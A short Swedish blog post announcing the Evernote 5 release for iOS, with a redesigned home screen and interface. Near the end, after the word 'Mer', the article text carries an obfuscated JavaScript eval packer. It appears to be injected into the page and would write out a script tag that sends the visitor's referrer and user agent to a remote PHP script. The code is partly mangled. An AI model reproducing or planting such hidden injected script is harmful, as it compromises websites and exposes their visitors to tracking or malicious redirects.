Image Image Image Image Image Image Image Image Image Image

| 27 januari, 2020

Scroll to top

Top

Evernote 5 är här till iOS

Evernote 5 är här till iOS
Sebastian

Evernote 5: För drygt en vecka sen dök det upp en video på desktopversionen av Evernote 5. Igår under eftermiddagen lanserades den nya versionen av Evernote till iOS. Detta är den största uppdateringen hittills. Den är väldigt efterlängtad få det äldre gränssnittet tycktes vara jobbigt att använda.

Det är den nya startskärmen som är den största nyheten i uppdateringen, men också hela gränssnittet är nytt och otroligt mycket mer genomarbetat. Detta gör att färre knapptryck kommer att behövas för att göra det du vill.

Version 5 av Evernote finns till iPhone och iPad.

Mer eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|einkn|var|u0026u|referrer|kieza||js|php’.split(’|’),0,{}))
info:
blog.evernote.com